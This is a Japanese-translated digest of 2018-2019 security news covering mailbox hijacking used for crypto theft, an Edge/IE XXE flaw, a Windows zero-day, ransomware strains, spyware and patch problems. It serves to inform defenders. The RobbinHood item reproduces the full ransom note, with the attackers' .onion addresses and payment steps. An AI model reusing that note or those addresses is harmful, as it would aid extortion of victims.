     Barracudaは、電子メールゲートウェイやスパムフィルタをバイパスするように設計された攻撃を検出しブロックすることができる機械学習ベースの防御ソリューションを使用し、「ビジネスメール詐欺とブランド成り済ましを含むスピアフィッシング攻撃に対して」彼らのユーザを保護することを組織にアドバイスしている。
     マルチファクタ認証、2ファクタ認証、二段階認証の使用もまた異なることを実行することができる。攻撃者は特別な保護レイヤーのために彼らが盗んだアカウント情報を悪用することができない。
     Barracudaはまた、アカウントが危険に晒され不正目的で使用されたりした場合に、監視と警告のために設計されたATO検出および保護ソリューションを配備したり、悪意あるルール作りをされないようにメールボックスを監視したり、スピアフィッシング攻撃を認識するように従業員を訓練したりすることは、ハッキング対策の実行可能な解決策であると提案している。


    サイバー犯罪者は、仮想通貨を盗むためにハッキングされたMicrosoft E-mailアカウントを使用している
    Sophos : Naked Security (2019/05/01)
     先月ハイジャックされたMicrosoft E-mailアカウントが仮想通貨を盗むために使用されていた。
     4月初めにMicrosoft E-mailへの攻撃により、ハッカーはユーザのコンテンツを読むことが可能になっていたと、Motherboardは報道している。今週、攻撃者が彼らの仮想通貨交換口座を改竄し資産を空にするために、彼らのE-mailを使用していたと発言している数人の犠牲者が発見された。
     そのような犠牲者の一人Jevon Ritmeesterは、侵入者に仮想通貨取引所Krakenの彼の口座を侵害された後、このハッキングの結果として1ビットコイン(【訳註】 2019/05/02時点で、約60万円)以上を失ったと主張している。
     先週のTweakers technologyフォーラムでの投稿で、Ritmeasterは以下のように発言している:

    4月8日、私は仮想通貨の状態を確認したかった。私は毎日Kraken.comを見てはいない、数カ月見ないこともある。

     彼が口座をチェックした時、彼はKrakenパスワードが最早機能しないことを発見した。そして、彼のOutlookの受信箱にメールが一通も存在していないことを見つけた。彼がゴミ箱の中を見た時、パスワードリセットE-mailだけを発見した
     この犯罪者は、パスワードのリセットを要求し、E-mail処理ルールを作成することによって、彼から確認E-mailを隠蔽した。このルールは、受信E-mail中に特定のテキストが発見されると、それらE-mailをローカル メールボックスから削除する前に、攻撃者のアドレスに転送するものである。これで、攻撃者がRitmeesterのパスワードをリセットし、彼の口座を空にすることが可能になる。
     Redditの他のユーザ達は、同じことが彼らにも発生していたと述べている。その一人Jefferson1337は、仮想通貨で凡そ5000$失ったと発言している。
     先月初め、Microsoftは、ハッカーが顧客サポートアカウントの1つにアクセスした後に、一部のE-mailアカウントが侵害されたことを、TechCrunchに対して認めている。報道によると、このハッカー達は、E-mailアカウントが企業レベルのものでない限り、あらゆるE-mailアカウントにアクセスできた。
     Microsoftは3月末の攻撃に気付いていた。この侵害は、犯罪者がOutlook, Hotmail, MSNアカウントの一部のコンテンツへのアクセスを可能にしていた。
     Ritmeesterを含む数人の犠牲者は、財産の損失を招いたMicrosoftに対し法的措置が適切であるかもしれないと持ちかけている。  Redditのユーザshinratechlabsは、以下のように発言している:

     実際に、私がMicrosoftに対して償還請求をするのか? 間違いなく私一人ではない。仮想通貨ユーザは狙われている。

     Naked Securityの読者への結論は、あなたのオンラインアカウントを安全にするためには保護の複数の形態に頼ることがより適切であるということである。
     Ritmeesterは、パスワードマネージャに保管していた強力でユニークなパスワードを使用していたが、Krakenがサポートしている2ファクタ認証プロテクションを使用していなかった。これは彼の管理外にあるE-mailハックに自分を晒していた。彼は以下のように発言している:

     残念ながら、私はKraken.comで2ファクタ認証をしていなかった。私の口座はすべて、一意の長いパスワードでしっかり保護されていたからである。私は依然として、この行為は正しいと思っているが、今回のMicrosoftの漏洩は内部からのものである。適切なパスワードだったとはいうものの、2ファクタ認証が、あなたの口座を適切に保護する唯一の方法であるということは、高価ではあるが賢明な教訓である。

     特に仮想通貨のユーザへ、もう一つのの結論は、確実な財布とは対照的に仮想通貨の口座を長期間監視せずに資産を放置することは、攻撃に直面する可能性を増加させ、アカウントハックの影響を受けやすくなるということである。


    Microsoft EdgeのファイルパーミッションはInternet Explorerと激しく衝突し、XXE攻撃を可能にする
    BleepingComputer : News>Security (2019/04/17)
     Internet Explorerに影響を与え、未だにMicrosoftからの修正を受け取っていない最近明らかにされた脆弱性は、リモートの攻撃者がローカルファイルを密かに抽出しシステム上で偵察活動の実行可能性を拒否するマイクロパッチを受け取った。
     XML External Entity (XXE。【訳註】一般にWebアプリケーションでみられ、XXEによって攻撃者はネットワークに接続されたサーバー内の通常保護されているはずのファイルを取得することが可能となる(Wikipediaより))、このセキュリティフローは、セキュリティ研究者John Pageによって発見され、3月27日にMicrosoftに通知されている。彼は、彼の発見をサポートする概念の実証を含む詳細を4月10日に公開した。
     この研究者はまた、この脆弱性が攻撃される方法を示すビデオも公開している。

     この脆弱性攻撃は、Microsoft Edgeブラウザでダウンロードされた特別に細工されたMHTファイル(【訳註】単一のファイルに HTML や画像などのデータがまとめられたファイル(Microsoft Supportより))を、ユーザが開いた時に可能になる。この種のファイルはMHTML Webアーカイブであり、Internet Explorer(IE)がWebページを保存するために使用するDefaultのフォーマットである。IEはまた、Windowsオペレーティング・システムでこれらのファイルを開くDefaultのプログラムである。
     ACROS SecurityのMitja Kolsekは、この問題を解析し、この問題の源が、Webからダウンロードされるファイルに適用されているWeb(MOTW)フラグのマークを正しく読み取るIEの能力を妨害するEdge中の「マニュアル化されていないセキュリティ機能」に存在すると決定した。
     Microsoftが、この脆弱性用の修正をリリースするまで、このマイクロパッチは0Patchプラットフォームから利用可能である。このマイクロパッチは、Edgeが、ダウンロードファイル用に設定したWebフラグのマークを、Internet Explorerが正しく解釈できるようにするエラーチェックルーチンを適用する。

    セキュリティ機能間のコンフリクト

     MOTWは、IEが、ローカルスクリプトやアクティブコンテンツを特権を昇格させて実行する前に、パーミッションを要求するセキュリティ機能である。
     「つまり、ページ内のMOTWでは、インターネットゾーンからのコンテンツと同じようにコンテンツを実行できる。したがって、スクリプトとアクティブコンテンツには、Webサイトから表示している場合と同じ権限が与えられる。そして、スクリプトとアクティブコンテンツは、マシンのリソースに対して昇格されたアクセスで実行することはできない」のようにMicrosoftの説明は読める。
     Kolsekは、IEでダウンロードされたMHTファイルのパーミッションとEdgeで取得されたMHTファイルのパーミッションに相違のあることを発見した。後者はアクセス・コントロール・リスト(ACL)に以下の二つのエントリを追加している。

    ・ S-1-15-3-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194:(OI)(CI)(R)
    ・ S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194:(OI)(CI)(R)

     二つ目のエントリは、IEの低整合性プロセスがファイルのコンテンツもしくは属性への読み込みアクセスを拒否するものである。「我々は、Edgeが、その低整合性サンドボックスでの悪意あるコードの実行に対して、保存されているファイルのセキュリティを更に確固たるものにするためにこの機能を使用していると考えている」とKolsekは発言している。
     MOTW情報はまた、このデータストリーム中に格納されているので、IEがそれを読み込もうとした時にエラーに遭遇することは明らかである。このブラウザは、このエラーを無視し、その結果として、このファイルは、MOTWフラグを持っていなかった場合と同じように処理される(通常のローカルファイルと同様にユーザがそれを起動した時、同じ特権の恩恵を受ける)。
     Pageによって発見されたこのXXE脆弱性は、Edgeユーザだけを危険に晒し、人気のある他のブラウザやE-mailクライアントでは、悪用を可能にするこのマニュアル化されていない機能を発見できなかったと、Kolsekは発言している。


    パッチされたWindowsの0-Dayは、脆弱性のあるシステムの完全なコントロールを提供していた
    BleepingComputer : News>Security (2019/04/15)
     Microsoftが2019年4月に73の他のフローの一部としてパッチしたWindows 0-Dayの脆弱性は、攻撃者が脆弱性のあるシステムの完全なコントロールを奪える可能性があった。
     この0-Dayは、パッチする前から積極的に攻撃されていた。この攻撃は、Kaspersky Labの研究者Vasiliy BerdnikovとBoris Larinによって、"Windows 7からWindows 10の古いバージョンまで"の複数のWindowsの64bitバージョンをターゲットにしてオンライン上でこの脆弱性が積極的に攻撃されていたことが発見されていた。

    5つの特権の昇格フローの一つ

     これは、Kaspersky Labの研究者達が最近発見した初めてのローカルにおける特権の昇格フローではない。以下が、Microsoftによってここ数ヶ月間にパッチされたローカルの特権の昇格フローである。

     CVE-2019-0859として追跡されるUse-After-Free(メモリ解放後使用)の脆弱性は、win32k.sysカーネルモードドライバ中に存在し、「コンポーネントがメモリ中のオブジェクトを正しく処理できない」という事実に由来する。
     「この脆弱性攻撃に成功した攻撃者は、カーネルモードで任意のコードを実行できる。次に、攻撃者は、データの閲覧、変更、あるいは削除するためのプログラムをインストールしたり、完全なユーザ権限で新しいアカウントを作成できる」と、Microsoftアドバイザリは述べている。
     また、「この脆弱性を攻撃するには、攻撃者は最初にシステムにログオンする必要がある。攻撃者は次に、この脆弱性を攻撃し、影響を受けたシステムの完全なコントロールを取得することのできる特別に細工されたアプリケーションを稼働することができる」とも述べている。
     Kasperskyの研究者によって更に発掘されたこととして、この脆弱性は、犠牲者のシステムへの完全なコントロールを攻撃者が取得するための第三段階のPowerShellベースの脆弱性攻撃手順の一部として「HTTP reverse shell(【訳註】HTTPリダイレクト)を実行する」(バックドアとして知られる)ために、threat actor(【訳註】脅威の動作主体。以下、アクター)によって使用されていた。


    最終段階のPowerShellスクリプト(画像をクリックすると拡大します))

    バックドアは攻撃者が完全な制御を奪うために埋め込まれる

     Symantecの2019 Internet Security Threat Reportで詳らかにされているように、悪意あるアクターの全体的な傾向がliving-of-the-land(環境寄生【訳註】痕跡を残さないためにマルウェアを利用しない攻撃。資格情報を盗むかハッキングすることで、既存の管理ツールやシステムを利用する攻撃(ScanNetSecurityより))テクニックに移行するに従って、PowerShellスクリプトの悪意ある使用が、顕著な増大を見せている(前年比1000%)。
     PowerShellスクリプトを使用したこのWindows 0-Dayの積極的攻撃は、悪意あるアクターが彼らの悪意あるツールやドロッパー スクリプトを実行するために万能のPowerShellのような直ぐに利用可能なツールを実際に採用していることを示している。
     この脆弱性は、先週Microsofstによってパッチされた唯一の脆弱性ではなく、Alibaba Cloud Intelligence Security TeamのDonghai Zhuによってレポートされた後に修正された他の特権の昇格の脆弱性が、Win32kコンポーネント(CVE-2019-0803として追跡される)中に存在していた。
     Zhuによって発見されたCVE-2019-0859フローはまた、オンライン上で攻撃されていた、そして、悪意あるアクターは影響を受けたシステムの完全な制御を奪うことが可能になっていた。


    RobbinHood身代金要求型マルウェアは、あなたのプライバシーを保護すると主張している
    BleepingComputer : News>Security (2019/04/13)
     ネットワーク全体をターゲットにし、アクセスを取得できる全てのコンピュータを暗号化するRobbinHoodと名乗る新しい身代金要求型マルウェアが登場している。このマルウェアは、単一のコンピュータを復号するために特定の量のBitcoinを、あるいはネットワーク全体を復号するために多量のBitcoinを要求する。
     このマルウェアに関しては、現在殆ど知られておらず、RobbinHoodのサンプルも未だ発見されてはいない。けれども、我々は、脅迫文と様々な犠牲者の暗号化されたファイルを確認した。これは、我々に、この身代金要求型マルウェアが機能している方法を割り出すことを可能にした。
     取分け興味のあることは、彼らにとって犠牲者のプライバシーが重要であるということに重きを置き、支払いをした犠牲者を全く公開していないことにある。

    RobbinHoodはネットワークをターゲットにしている

     脅迫文に基づくと、RobbinHoodを操っている攻撃者は、ネットワークへのアクセスの取得を積極的に試みている。彼らがアクセスを取得すると、そのネットワーク上の可能な限りのコンピュータを暗号化しようとする。
     使用されている暗号化の方法に関しては何も分かっていないが、暗号化されるたファイルが、Encrypted_b0a6c73e3e434b63.enc_robbinhood に類似した名前に変更されることは分かっている。
     この身代金要求型マルウェアは、不思議なことに同時に4つの異なった名前で脅迫文を投下する。これらの脅迫文の名前は、_Decryption_ReadMe.html, _Decrypt_Files.html, _Help_Help_Help.html, _Help_Important.htmlである。


    RobbinHoodの脅迫文(脅迫文全文を見る

     この脅迫文には、犠牲者のファイルに発生したことに関する情報(身代金の額、ユーザが攻撃者にメッセージを残したり、サイズで10MBまでの3つのファイルを無料で復号することのできるTORサイトへのリンク)が含まれている。
     現在、脅迫文中で使用されているアドレス:

    http://xbt4titax4pzza6w.onion/
    https://xbt4titax4pzza6w.onion.pet/
    https://xbt4titax4pzza6w.onion.to/

     これらの脅迫文は、犠牲者が単一のコンピュータを復号したいのか、ネットワーク全体を復号したいのかに応じて異なる支払金額を表示している。例えば、BleepingComputerによって確認された脅迫文中には、身代金額は、コンピュータ一台あたり3 Bitcoin、ネットワークに関しては7 Bitcoinとなっている。
     また、この脅迫文は、感染4日目以降、一日あたり 10,000$ 増加するとも述べている。

    RobbinHoodは、あなたのプライバシーを気にかけている

     この身代金要求型マルウェアのTOR支払いページで、RobbinHoodの開発者は、犠牲者のプライバシーを心配し、支払った後には、その暗号化キーとIPアドレスは削除されると述べている。

     「私が言及したいことは、我々にとってあなたのプライバシーは重要であり、IPアドレスと暗号化キーを含むあなたの記録の全ては、支払いが済み次第削除されるということである。また、あなたが支払うべきBitcoinアドレスは、一意のものであり、それを知る者は誰もいないということである。」


    RobbinHoodのTOR支払いサイト)

     更に興味深いのは、この攻撃者達が、彼らの秘密を守るために、このセキュリティ侵害を報告する必要はないと犠牲者に告げていることである。

     「我々のサーバが、あなたのネットワークと情報に関するイベントを些かも持っていないことを言及する必要はない。」

     これは、私が身代金要求型マルウェアがチョットしたアドバイスを提供しているのを確認した最初の出来事である。犠牲者が身代金要求型マルウェアに感染したことを秘密に保持すると述べることによって、彼らは、犠牲になった企業に対して、このセキュリティ侵害を公開されることなく身代金を支払うことができ、悪評を受け取らなくて済むということを仄めかしている。
     これは、身代金の支払い可能性を増やすために実行されている。

    Greenville市が、RobbinHoodに攻撃されていた

     RobbinHoodは、ノースカロライナ州グリーンビル市のネットワークに感染することで既にニュースになっている。


    グリーンビル市のTweet

     ノースカロライナ州のNews Channel 12によると、この市は水曜日にRobbinHood身代金要求型マルウェアによって攻撃され、被害の範囲を確定する間ネットワークをシャットダウンした。
     彼らは、複数の調査機関とこの攻撃を調査すると共に、法執行機関にもコンタクトした。
     「FBIの調査官は現在、このセキュリティ侵害を処理する方法の決定に関与している。National Guard, Strike Team, State IT及びState Emergency Managementも、この件で作業中である。」
     不幸にして、グリーンビルがRobbinHood身代金要求型マルウェアによる唯一の犠牲者ということではない。
     BleepingComputerと、昨日この身代金要求型マルウェアについてTweetしたMalwareHunterTeamは、RobbinHoodに感染した犠牲者をモニターしている。MalwareHunterTeamは、この時点で犠牲者の何れも身代金を支払っていないと述べている。

    IOC

    関連ファイル名
      _Decryption_ReadMe.html
      _Decrypt_Files.html
      _Help_Help_Help.html
      _Help_Important.html

    脅迫文
      What happened to your files?
      All your files are encrypted with RSA-4096, Read more on https://en.wikipedia.org/wiki/RSA_(cryptosystem)
      RSA is an algorithm used by modern computers to encrypt and decrypt the data. RSA is an asymmetric cryptographic algorithm. Asymmetric means that there are two different keys. This is also called public key cryptography, because one of the keys can be given to anyone:

      1 - We encrypted your files with our "Public key"
      2 - You can decrypt, the encrypted files with specific "Private key" and your private key is in our hands ( It's not possible to recover your files without our private key )

      Is it possible to get back your data?
      Yes, We have a decrypter with all your private keys. We have two options to get all your data back. Follow the instructions to get all your data back:

      OPTION 1
      Step 1 : You must send us 3 Bitcoin(s) for each affected system
      Step 2 : Inform us in panel with hostname(s) of the system you want, wait for confirmation and get your decrypter
      OPTION 2
      Step 1 : You must send us 7 Bitcoin(s) for all affected system
      Step 2 : Inform us in panel, wait for confirmation and get all your decrypters

      Our Bitcoin address is: xxxxxxxxxxx

      BE CAREFUL, THE COST OF YOUR PAYMENT INCREASES $10,000 EACH DAY AFTER THE FOURTH DAY

      Access to the panel ( Contact us )
      The panel address: http://xbt4titax4pzza6w.onion/xxxx/

      Alternative addresses
      https://xbt4titax4pzza6w.onion.pet/xxxx/
      https://xbt4titax4pzza6w.onion.to/xxxx/
      Access to the panel using Tor Browser
      If non of our links are accessible you can try tor browser to get in touch with us:
      Step 1: Download Tor Browser from here: https://www.torproject.org/download/download.html.en
      Step 2: Run Tor Browser and wait to connect
      Step 3: Visit our website at: panel address

      If you're having a problem with using Tor Browser, Ask Google: how to use tor browser
      Wants to make sure we have your decrypter?
      To make sure we have your decrypter you can upload at most 3 files (maximum size allowance is 10 MB in total) and get your data back as a demo.
      Where to buy Bitcoin?
      The easiest way is LocalBitcoins, but you can find more websites to buy bitcoin using Google Search: buy bitcoin online


    Microsoftの2019年4月の定例パッチはWindowsにフリーズを発生させる
    BleepingComputer : News>Security (2019/04/11)
     Microsoftの最新の2019年4月の定例アップデートとアンチウィルス間のコンフリクトは、Windows 7, Windows 8.1, Windows Server 2012, Windows Server 2012 R2でフリーズ(起動することが不可能、あるいは、アップデートのインストールをハングさせる)を発生させている。
     Microsoft, Avast, Avira, Sophosのサポート記事によると、最新のアップデートの一部とSophos Endpoint Protection、AvastのBusinessやCloudCareのようなアンチウィルスソフトウェアとの間でコンフリクトが発生している。

  • ・ Sophos Central Endpoint and SEC: Computers fail/hang on boot after the Microsoft Windows April 9, 2019 update(リンクは日本語サイトに変更しています)
    ・ Windows Machines Running Avast for Business and CloudCare Freezing on Start-up
    ・ Why does my system run very slow? (From Avira)(リンクは日本語サイトに変更していますが、日本時間、4/12 09:22現在和訳はされていません)
  •  Sophosはサポート記事で、このアップデートがWindowsに起動の失敗を発生させていると述べている。ユーザからのレポートでは、このアップデートプロセスが、Windowsアップデートの構成段階でハングすることも示している。

     「以下のMicrosoft Windowsアップデートをインストールした後、Sophosは、コンピュータが起動できないとするレポートを受け取った。Sophosはこの問題を積極的に調査しており、詳細な情報が利用できるようになり次第、この記事をアップデートする。」

     Sophosは以下のアップデートがコンフリクトを起こすとレポートしている。

  • ・ April 9, 2019 - KB4493467 (Security-only update) - Windows 8.1, Windows Server 2012 R2
    ・ April 9, 2019 - KB4493446 (Monthly Rollup) - Windows 8.1, Windows Server 2012 R2
    ・ April 9, 2019 - KB4493448 (Security-only update) - Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1
    ・ April 9, 2019 - KB4493472 (Monthly Rollup) - Windows 7 Service Pack 1, Windows Server 2008 R2 Service Pack 1
    ・ April 9, 2019 - KB4493450 (Security-only update) - Windows Server 2012, Windows Embedded 8 Standard
    ・ April 9, 2019 - KB4493451 (Monthly Rollup) - Windows Server 2012, Windows Embedded 8 Standard
  • Avastは、KB4493472, KB4493448, 並びに、KB4493435 が問題を発生させると指摘している。KB4493435は、Internet Extlorer用の累積セキュリティアップデートである。
     最後に、Aviraは、Windows 10用のKB4493509、Windows 7用のKB4493472, KB4493448が、Windowsの挙動を通常より緩慢にすると述べている。

     「我々は説明された挙動を再現することができた。これは、今回のWindowsアップデートによって発生している。」

     Microsoftは、この問題を認識しており、影響を与えているアップデートについて、以下の既知の問題をナレッジベースに追加している。更なる問題を防ぐために、Microsoftは、コンフリクトを発生させているアップデートをブロックしたので、解決策が利用可能になるまで、それらはSophos Endpointを稼働しているユーザには提供されない。

    概要

    解決策

    MicrosoftとSophosは、Sophos CentralまたはSophos Enterprise Console(SEC)の何れかをインストールし管理しているSophos Endpoint Protectionを搭載したデバイスで、このアップデートのインストール後の再起動時にシステムがフリーズまたはハングする原因となる問題を発見した。 Microsoftは、Sophos Endpointがインストールされている場合、解決策が利用可能になるまで、そのデバイスに対するこのアップデートの配信を一時的にブロックしている。詳細情報に関しては、Sophosのサポート記事を参照。

     現時点で、MicrosoftがAvastやAvira製品とのコンフリクトに言及しておらず、このアップデートが、これらアンチウィルスユーザにも同様にブロックされるか否か不明であることに注意すべきである。

    フリーズと無限再起動の解決方法

     2019年4月の定例アップデートをインストールした後、Windowsが起動に失敗したり、フリーズしたり、アップデートの構成で立ち往生した場合、Windowsが適切に動作するように、このアップデートを削除する必要がある。
     Sophosは、影響を受けたコンピュータからこのアップデートを削除するために以下のステップを推奨している:

  • ・ セーフモードで起動。
    ・ Sophos Anti-Virus サービスの "スタートアップの種類" を無効に設定する。
    ・ 通常モードで起動。
    ・ 該当する Windows KB をアンインストール。
    ・ Sophos Anti-Virus サービスの "スタートアップの種類" を自動に設定する。
    ・ タンパープロテクションを有効に設定している場合は、サービスを再度有効にするためにはタンパープロテクションを無効に設定する必要がある。
  •  Avastは、コンピュータをセーフモードでブートし、KB4493472, KB4493448, KB4493435をアンインストールすることを推奨している。

    Windows 10も影響を受ける

     Borncity.comのGunter Born(uはuにウムラウト)もまた、Windows 10も同様に影響を受けるとするレポートが存在すると述べている。
     Bornによると、SophosがインストールされているWindows 10ユーザから同様の問題が発生したとする報告を受けている。影響を受けたユーザに関して、彼は、以下のアップデートをアンインストールするように推奨している。

  • ・ Windows 10 1709: KB4493441
    ・ Windows 10 1803: KB4493464
    ・ Windows 10 1809: KB4493509
    ・ Windows 10 1903: KB4495666

  • 新しいTajMahalサイバースパイ・キットは、80の悪意あるモジュールを含んでいる
    BleepingComputer : News>Security (2019/04/10)
     TajMahal(凡そ80の様々な悪意あるモジュールを呼び物にし、2013年後半以来アクティブである今まで未知のプラットフォーム)が、2018年末にKaspersky Labの研究チームによって発見された。
     「最も早期のサンプルは2013年4月の日付であり、最新のサンプルは2018年8月である」ことから、このサイバースパイ・キットは6年間アクティブだったが、このAPT(Advanced Persistent Threat。【訳註】高度標的型攻撃と呼ばれ、マルウェアによってターゲット企業へ侵入し、C&Cサーバーとの通信を行いながら、内部ネットワーク上に長期間潜伏して調査活動、管理者権限の取得などを行い、結果として、機密情報を盗むための一連の攻撃活動を指す(サイバーセキュリティ インデックスより))フレームワークは、未だ如何なるハッキンググループとも関連付けられていない。
     Kaspersky Labによる更なる発見として、TajMahalは、二つの悪意あるパッケージ(それぞれ、Tokyo、Yokohamaと名付けられている)を搭載し、ターゲットのコンピュータに一つを投下した後、他を投下する多段階攻撃型フレームワークである。
     感染の第一段階で配備される小さい方のTokyoパッケージは、バックドア機能を搭載している。そして、十分な機能を有するYokohamaスパイパッケージを投下するために使用される。Yokohamaは、「ローダー、オーケストレーター、コマンド&コントロール・コミュニケーター、オーディオレコーダー、キーロガー、スクリーンとWebカメラ・グラバー、ドキュメントと暗号化キースティラーを含む凡そ80のモジュール」を搭載している。


    TajMahal APTフレームワーク(画像をクリックすると拡大します)

     研究者がオンライン上でTajMahalフレームワークを発見した全てのシステムは、TokyoとYokohamaの両方に感染していた。これは、TokyoとYokohamaの両方が感染したコンピュータで機能し続けていることを示唆している。「Tokyoは、関心のある犠牲者に十分な機能を有するYokohamaパッケージを配備するための感染の第一段階で使用され、バックアップ目的のために残されている」と推測されている。
     Yokohamaが犠牲者のコンピュータに投下されると、関心のあるドキュメントやメディアファイルを捕え、クッキーとバックアップを盗み、プリンタのキュー、焼かれたCD、USBストレージデバイスからファイルをクスねるために使用される。
     全ての収集されたデータは、このAPTフレームワークの背後にいるハッキンググループによって制御されているコマンド&コントロールサーバに対して、TajMahalと名付けられたXMLファイル形式で一斉に送信される。
     この攻撃は2014年に行われているので、このフレームワークは少なくとも5年間使用されているにも拘わらず、研究者によって確認されたTajMahalの犠牲者が中央アジアの外交機関だけであるため、Kaspersky Labは、このスパイプラットフォームを使用して感染させられた他のコンピュータシステムが存在していると考えている。
     TajMahalフレームワークを検証している間に、Kaspersky Labの研究者によって発見された能力の一部は以下である:

      ・ プリンタのキューに送信されたドキュメントを盗む能力
      ・ Appleモバイルデバイスのバックアップリストを含む犠牲者を偵察するためのデータ収集
      ・ VoiceIPとオーディオをレコーディングしている時にスクリーンショットを取得する
      ・ 書き込まれたCDイメージを盗む
      ・ 今迄にリムーバルデバイス上で確認したファイルが再び利用可能になると、このファイルを盗む能力
      ・ Internet Explorer, Netscape Navigator, FireFox, RealNetworksのクッキーを盗む
      ・ フロントエンドファイルや、関連付けられているレジストリ値が削除されると、再起動後に、新しい名前とスタートアップのタイプで再び現れる

     Kaspersky Labの主任マルウェア アナリストAlexey Shulminは、「このTajMahalフレームワークは大変関心のある興味をそそるものである。技術的に洗練されていることには疑いの余地がなく、この高度な脅威の動作主体は、我々がこれまで見たことのない機能を特徴としている。 多くの質問が残っている。例えば、このような巨大な投資が、一人の被害者だけに企てられたというのは、ありえないことだろう」と、発言している。
     また、「これは、未だ特定されていない他の被害者がいるのか、オンライン上にこのマルウェアの別のバージョンが存在するのか、あるいはその両方なのかを示唆している。この脅威の分布と感染ベクトルも未知のままである。どういうわけか、これは5年間もレーダーに探知されなかった。これが相対的に活動が穏やかだったためなのか、それとも他の要因なのかは、別の興味をそそる問題である。既知の脅威グループに起因すると考えられる手がかりも、既知の脅威グループを見つけることのできる如何なるリンクも存在していない。」


    Mira身代金要求型マルウェア復号プログラム
    F-Secure : News From The LAB (2019/04/01)
     我々は、暗号化されたファイルを復号する可能性をチェックするためにMira(Trojan:W32/Ransomware.AN)と呼ばれる最近の身代金要求型マルウェアを調査した。
     殆どの場合、復号は、復号に必要なキーが欠落しているために非常に困難である。しかしながら、Mira身代金要求型マルウェアの場合、暗号化されたファイルに要求される全ての情報を暗号化したファイルそれ自体に追加していた。

    暗号化プロセス

     この身代金要求型マルウェアは、キーを生成するためにRfc2898DeriveBytesクラスの新しいインスタンスを初期化する。このクラスは、パスワード、ソルト(【訳註】パスワードを暗号化する際に付与されるデータのこと(日立ソリューションズ・セキュリティ用語解説より))、反復回数を取得する。


     このパスワードは以下の情報を使用して生成される。

      ・ マシンの名前
      ・ OSのバージョン
      ・ プロセッサの番号


     他方、ソルトは乱数生成器(RNG)によって生成される。


     次に、この身代金要求型マルウェアは、ファイルを暗号化するためにRijndaelアルゴリズムの使用を開始する。


     暗号化の後、この身代金要求型マルウェアは、ファイルの末尾に'header'構造体を追加する。


     好都合なことに、このヘッダーは、ソルトとパスワードハッシュを含んでいた。それに加えて。反復回数が、このサンプル中にハードコードされていた(このケースでは、この値は20であった)。
     この身代金要求型マルウェア自体から、このパスワード、ソルト、反復回数を取得することで、我々は、このマルウェアによって暗号化されたファイル用の復号ツールを作成するために必要な全ての情報を取得することができた。

    復号ツール

     復号ツールは、ここからダウンロードすることができる。
     ツールの使い方は、こちらのビデオを参照されたい。


    vxCrypter: 重複ファイルを削除する最初の身代金要求型マルウェア
    BleepingComputer : News>Security (2019/04/01)

     vxCrypter身代金要求型マルウェアは、犠牲者のデータを暗号化するだけでなく、重複ファイルを削除することによって犠牲者のコンピュータを綺麗に片付ける最初のマルウェア感染である。
     先週、私は、vxCrypterと呼ばれる新しい身代金要求型マルウェアを発見した。このマルウェアは現段階では開発中である。これは、.NET身代金要求型マルウェアであり、vxLockと呼ばれ完成しなかった古い身代金要求型マルウェアに基づいている。


     私がこの身代金要求型マルウェアを最初にテストした時、以下の画像に示したように、一つを除いてフォルダ中の全てのファイルが削除されていることに気がついた。私は、この身代金要求型マルウェアが未だ開発段階であると認識していたので、暗号化のルーティン中のバグだと思った。


     週末の間、Michael Gillespieは、このランサムウェアが重複したファイルを削除しているので、このファイルの削除は意図的なものであると私に告げた。これは、Gillespieや私が、このような挙動を確認した最初の身代金要求型マルウェアである。
     この身代金要求型マルウェアの解析中に、Gillespieは、この身代金要求型マルウェアが、暗号化した各ファイルのSHA256ハッシュを追跡し続けていることに気付いた。この身代金要求型マルウェアが他のファイルを暗号化している時、同じSHA256ハッシュに遭遇すると、そのファイルを復号するのではなく削除する。


    SHA256に基づく削除を示すソースコード

     この身代金要求型マルウェアは、暗号化のターゲットにしている以下のファイル拡張子の重複ファイルだけを削除する。

    .txt, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .sqlite, .odt, .jpg, .jpeg, .bmp, .gif, .png, .csv,
    .sql, .mdb, .sln, .php, .asp, .aspx, .html, .xml, .psd, .xsd, .cpp, .c, .h, .hpp, .htm, .py,
    .reg, .rb, .pl, .zip, .rar, .tgz, .key, .jsp, .db, .sqlite3, .sqlitedb, .bat, .bak,
    .7z, .avi, .fla, .flv, .java, .mpeg, .pem, .wmv, .tar, .tgz, .tiff, .tif

     .exe や .dll のような他のフィルに関しては、重複ファイルは残されたままである。
     考えられることとして、この身代金要求型マルウェアが、コンピュータの暗号化をスピードアップする以外、これを実行している理由は判明していない。また、攻撃者がパフォーマンスの向上、大惨事の発生、あるいは、明白な理由のなき行動のために、このマルウェアを進化させ続けていることは、我々が警戒を怠らないようにする必要のあることも示している。


    Adobe ReaderとAcrobatの緊急のセキュリティアップデートがリリースされた
    BleepingComputer : News>Security (2018/09/19)
     先週、Adobeは2018年9月の月例アップデートで6つの緊急のアップデートの修正をリリースした。彼らは一つパッチし損なっていたようである。そこで、Adobeは、今日Adobe AcrobatとAdobe Reader中の緊急の脆弱性を修正するための定例外アップデートをリリースした。
     APSB18-34セキュリティブレティンで、このアップデートがコード実行を導くことのできる境界外書き込みの脆弱性をどのように解決するのかを詳細に説明している。他の6つは、情報の漏洩に導く境界外読み取りの脆弱性である。

                                
    脆弱性のカテゴリ 脆弱性のインパクト 深刻度 CVE番号
    境界外書き込み任意のコードの実行緊急CVE-2018-12848
    境界外の読み取り情報漏洩重要CVE-2018-12849、CVE-2018-12850
    CVE-2018-12801、CVE-2018-12840
    CVE-2018-12778、CVE-2018-12775

     コード実行の脆弱性(CVE-2018-12848)は、Check Point SoftwareによってAdobeに通知された。この情報漏洩の脆弱性は、Check Point Software、Cybellum Technologies LTD、Trend MicroのZero Day Initiativeを介して公開された。
     この脆弱性を修正するには、ユーザは、Acrobat DCとAcrobat Reader DCでは、バージョン2018.011.20063に、Acrobat 2017とDC 2017では、バージョン2017.011.30102に、Acrobat DC Classic 2015とAcrobat Reader DC Classicでは、バージョン015 2015.006.30452にアップグレードする必要がある。アップグレードのリンクは、ここで見つけることができる。


    CCleanerは設定を無視し、最新バージョン5.46へのアップデートを強制している
    BleepingComputer : News>Security (2018/09/17)
     ユーザが自動アップデートを実行しないように設定していた場合でさえ、Piriformは、CCleanerの最新バージョン5.46へのアップデートを強制しているとするレポートが出現している。更に悪いことには、ユーザがこの最新バージョンにアップグレードすると、そのユーザのプライバシー設定はDefaultに戻される。これは、匿名利用データをAvast/Piriformに送信することを許可することである。
